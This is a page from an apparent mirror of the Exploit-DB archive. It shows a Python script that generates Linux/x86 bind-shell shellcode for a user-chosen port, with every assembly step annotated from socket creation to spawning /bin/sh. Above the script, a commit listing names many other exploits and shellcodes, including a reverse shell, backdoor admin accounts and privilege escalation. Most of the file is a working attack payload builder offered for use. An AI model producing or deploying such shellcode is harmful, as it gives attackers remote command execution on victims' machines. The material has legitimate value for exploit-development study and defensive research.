bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux_x86/48032.py
Offensive Security 720fabd066 DB: 2020-07-28 
114 changes to exploits/shellcodes

Notepad++ < 7.7 (x64)  - Denial of Service

winrar 5.80 64bit - Denial of Service
WinRAR 5.80 (x64) - Denial of Service

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation

TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change

Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)
Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017)

Microsoft Word 2007 (x86) - Information Disclosure

IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation

ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation

Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution
Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution

Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation

R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)

MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation
MySQL User-Defined (Linux) (x86) - 'sys_exec' Local Privilege Escalation

Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)

Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation
Microsoft Windows (x86/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation

Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation

R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)

Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation

Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation

Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)

Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path

DEWESoft X3 SP1 (64-bit) - Remote Command Execution
DEWESoft X3 SP1 (x64) - Remote Command Execution

CompleteFTP Professional 12.1.3 - Remote Code Execution

TeamCity Agent XML-RPC 10.0 - Remote Code Execution

eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution

FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)
FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)

Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)

Linux/x86 - Kill All Processes Shellcode (14 bytes)
Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)
Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)
Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)
Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
2020-07-28 05:01:59 +00:00

147 lines
No EOL
8.9 KiB
Python
Executable file
Raw Blame History

# Title: Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
# Author: Bobby Cooke
# Date: 2020-01-29
# Tested On: Ubuntu 3.13.0-32-generic #57~precise1-Ubuntu i386
#!/usr/bin/python
# Take users TCP port as input
port = raw_input("Enter TCP Port Number: ")
# Convert input string to an integer
deciPort = int(port)
# Format the integer to Hex Integer
hexPort = "{:02x}".format(deciPort)
#print "Hex value of Decimal Number:",hexPort
# Check the length of the output hex string
hexStrLen = len(hexPort)
# Check if the hex string is even or odd with modulus 2
oddEven = hexStrLen % 2
# if it returns 1 then it's odd. We need to add a leading 0
if oddEven == 1:
hexPort = "0" + hexPort
# converts the port number into the correct hex format
tcpPort = "\\x".join(hexPort[i:i+2] for i in range(0,len(hexPort), 2))
print "Your TCP Port in Hex is:","\\x"+tcpPort
nullCheck = deciPort % 256
if nullCheck == 0 :
print "Your TCP Port contains a Null 0x00."
print "Try again with a different Port Number."
exit(0)
# 1. Create a new Socket
# <socketcall> ipv4Socket = socket( AF_INET, SOCK_STREAM, 0 );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 = "\x31\xc0" # xor eax, eax; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x01" # mov bl, 0x1; EBX is set to create a socket
scPart1 += "\x31\xc9" # xor ecx, ecx; This sets the ECX Register to NULL (all zeros).
scPart1 += "\x51" # push ecx; ECX[2]. ECX is NULL
scPart1 += "\x53" # push ebx; ECX[1]. EBX already has the value we need for ECX[1]
scPart1 += "\x6a\x02" # push dword 0x2 ; ECX[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart1 += "\x89\xe1" # mov ecx, esp ; ECX now holds the pointer to the arg array
scPart1 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes socket().
scPart1 += "\x96" # xchg esi, eax ; After the SYSCAL, sockfd is stored in the EAX Register, save in ESI
# 2. Create TCP-IP Address and Bind the Address to the Socket
# struct sockaddr_in ipSocketAddr = {
# .sin_family = AF_INET, .sin_port = htons(4444), .sin_addr.s_addr = INADDR_ANY};
# ARG[0] ARG[1] ARG[2]
#<socketcall> bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x02" # mov bl, 0x2 ; EBX is set to create a socket
scPart1 += "\x31\xd2" # xor edx, edx ; This sets the EDX Register to NULL (all zeros).
scPart1 += "\x52" # push edx ; ARG[2]. EDX is NULL, the value needed for INADDR_ANY.
scPart1 += "\x66\x68" # push word 0x?? ; ; ARG[1]. This is for the TCP Port #
#tcpPort = "\x11\x5c" # TCP Port 4444 = 0x5c11
scPart2 = "\x66\x53" # push bx ; ARG[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x89\xe1" # mov ecx, esp ; Save the memory location of ARG[0] into the EDX Register.
scPart2 += "\x6a\x10" # push 0x10 ; ECX[2]. Our Struct of ARG's is now 16 bytes long (0x10 in Hex).
scPart2 += "\x51" # push ecx ; ECX[1]. The pointer to the beginning of the struct we saved
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Now we need to point ECX to the top of the loaded stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80
# 4. Listen for incoming connections on TCP-IP Socket.
# <socketcall> listen( ipv4Socket, 0 );
# EAX=0x66 EBX ECX[0] ECX[1]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x04" # mov bl, 0x4 ; EBX is set to listen().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; Executes listen(). Allowing us to handle incoming TCP-IP Connections.
# 5. Accept the incoming connection, and create a connected session.
# <socketcall> clientSocket = accept( ipv4Socket, NULL, NULL );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x05" # mov bl, 0x5 ; EBX is set to accept().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[2]. Push the value 0x0 to the stack.
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80
scPart2 += "\x93" # xchg ebx, eax ; The created clientSocket is stored in EAX after receiving a connection.
# 6. Transfer STDIN, STDOUT, STDERR to the connected Socket.
# dup2( clientSocket, 0 ); // STDIN
# dup2( clientSocket, 1 ); // STDOUT
# dup2( clientSocket, 2 ); // STDERR
# EAX EBX ECX
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\xb1\x02" # mov cl, 0x2 ; This sets the loop counter, and
# ; will also be the value of "int newfd" for the 3 dup2 SYSCAL's.
#dup2Loop: ; Procedure label for the dup2 Loop.
scPart2 += "\xb0\x3f" # mov al, 0x3f ; EAX is now 0x0000003F = SYSCALL 63 - dup2
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes accept().
# ; Allowing us to create connected Sockets.
scPart2 += "\x49" # dec ecx ; Decrements ECX by 1
scPart2 += "\x79\xf9" # jns dup2Loop /jns short -5 ; Jump back to the dup2Loop Procedure until ECX equals 0.
# 7. Spawn a "/bin/sh" shell for the client, in the connected session.
# execve("/bin//sh", NULL, NULL);
# EAX EBX ECX EDX
scPart2 += "\x52" # push edx ; Push NULL to terminate the string.
scPart2 += "\x68\x2f\x2f\x73\x68" # push 0x68732f2f ; "hs//" - Needs to be 4 bytes to fit on stack properly
scPart2 += "\x68\x2f\x62\x69\x6e" # push 0x6e69622f ; "nib/" - This is "/bin//sh" backwards.
scPart2 += "\x89\xe3" # mov ebx, esp ; point ebx to stack where /bin//sh +\x00 is located
scPart2 += "\x89\xd1" # mov ecx, edx ; NULL
scPart2 += "\xb0\x0b" # mov al, 0xb ; execve System Call Number - 11
scPart2 += "\xcd\x80" # int 0x80 ; execute execve with system call interrupt
# Initiate the Shellcode variable we will output
shellcode = ""
# Add the first part of the tcp bind shellcode
for x in bytearray(scPart1) :
shellcode += '\\x'
shellcode += '%02x' %x
# Add the user added tcp port to the shellcode
shellcode += "\\x"+tcpPort
# Add the second part of the tcp bind shellcode
for x in bytearray(scPart2) :
shellcode += '\\x'
shellcode += '%02x' %x
print "Choose your shellcode export format."
exportFormat = raw_input("[1] = C Format\n[2] = Python Format\n[1]: ")
if exportFormat == "2" :
formatSC = '"\nshellcode += "'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
print "[-----------------------Your-Shellcode------------------------]"
print 'shellcode = "'+formatSC+'"'
else :
formatSC = '"\n"'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
print "[----------------Your-Shellcode------------------]"
print ' unsigned char shellcode[] = \\\n"'+formatSC+'";'
Reference in a new issue View git blame Copy permalink